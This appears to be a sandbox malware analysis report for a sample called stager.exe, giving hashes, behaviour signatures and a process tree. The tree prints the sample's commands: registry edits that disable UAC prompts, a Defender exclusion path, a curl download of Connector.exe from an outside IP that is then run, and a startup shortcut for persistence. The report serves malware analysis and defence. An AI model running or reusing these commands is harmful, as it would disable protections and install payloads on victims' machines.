Analysis

  • max time kernel
    152s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags
    arch:x64 arch:x86 image:win10v2004-20230703-en locale:en-us os:windows10-2004-x64 system
  • submitted
    19/07/2023, 13:01

General

  • Target

    stager.exe

  • Size

    1.9MB

  • MD5

    4ed2a8948a165b72025d5868a31a34c8

  • SHA1

    b25b9db66eefe9418bb398a8a5ffe4aebb7d4ff8

  • SHA256

    79d1a9ec049f598528e505aa71fdd68f01f7abcd8cb29c1e54ba018d239ae282

  • SHA512

    64411bb2f3510f26114d809409dd9af29238fb1c43ee005c08c3b00826be0bce0230ad26afc786961b659d8cc470f59ed12108b4a11056b702a516330bbec380

  • SSDEEP

    24576:GXjaqCL0DG3EZJOHVXGGUIHjNGxmKg7xf:GXjaADG3EWVd

Score
10/10

Malware Config

Signatures

  • UAC bypass 3 TTPs 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\stager.exe
    "C:\Users\Admin\AppData\Local\Temp\stager.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4780
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1148
      • C:\Windows\system32\reg.exe
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        PID:3020
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1088
      • C:\Windows\system32\reg.exe
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        PID:556
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c mkdir "C:\MicS"
      2⤵
      PID:3572
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "C:\MicS"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3900
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command Add-MpPreference -ExclusionPath "C:\MicS"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1268
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl -o "C:\MicS\Connector.exe" "http://13.50.250.113/Connector.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:988
      • C:\Windows\system32\curl.exe
        curl -o "C:\MicS\Connector.exe" "http://13.50.250.113/Connector.exe"
        3⤵
        PID:4796
    • C:\MicS\Connector.exe
      "C:\MicS\Connector.exe"
      2⤵
      • Executes dropped EXE
      PID:4636

Network

MITRE ATT&CK Enterprise v6

Downloads

      • C:\MicS\Connector.exe

        Filesize

        1.9MB

        MD5

        d4f8be5303fc3c96545a4d259fe884c1

        SHA1

        251a4e6299c6b2f577ad25d6de765cca0e097750

        SHA256

        21c79c8aba3fd51e5c73f4d0b080763c8e3eef8f450df99c3686d3d0e21e18c0

        SHA512

        9a7212936cdec950db0ffb58767109df0142317378437a4c7d96b9b4a7c9d6613ae573e1689a986233fa4a5d86e51b00443c2afe57ef0f91fa0e59753f200658

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_joaz121d.s0x.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Connector.lnk

        Filesize

        659B

        MD5

        02e8749bd66771e8721ca6562582b593

        SHA1

        cfedc0fc7bc4f0922fdacba822d36a0d556702ea

        SHA256

        5331a73d6b6a63561924907c1887ee349409698e30e068450dbde47803d08f67

        SHA512

        acd391d49db843e8fb204fd657ed6b11617d44b379f1cef1f43dc48ebe6ae4ea7109c2716e485420aa55955578dbd6edd35a8a0cb84b44660afa0f374f893a73

      • memory/1268-138-0x0000015A54BD0000-0x0000015A54BE0000-memory.dmp

        Filesize

        64KB

      • memory/1268-146-0x0000015A56DC0000-0x0000015A56DE2000-memory.dmp

        Filesize

        136KB

      • memory/1268-147-0x0000015A54BD0000-0x0000015A54BE0000-memory.dmp

        Filesize

        64KB

      • memory/1268-150-0x00007FFC5CFE0000-0x00007FFC5DAA1000-memory.dmp

        Filesize

        10.8MB

      • memory/1268-137-0x0000015A54BD0000-0x0000015A54BE0000-memory.dmp

        Filesize

        64KB

      • memory/1268-136-0x00007FFC5CFE0000-0x00007FFC5DAA1000-memory.dmp

        Filesize

        10.8MB

      • memory/4636-171-0x00007FF6C8DF0000-0x00007FF6C908B000-memory.dmp

        Filesize

        2.6MB

      • memory/4636-172-0x00007FF6C8DF0000-0x00007FF6C908B000-memory.dmp

        Filesize

        2.6MB

      • memory/4780-133-0x00007FF635620000-0x00007FF6358B1000-memory.dmp

        Filesize

        2.6MB

      • memory/4780-170-0x00007FF635620000-0x00007FF6358B1000-memory.dmp

        Filesize

        2.6MB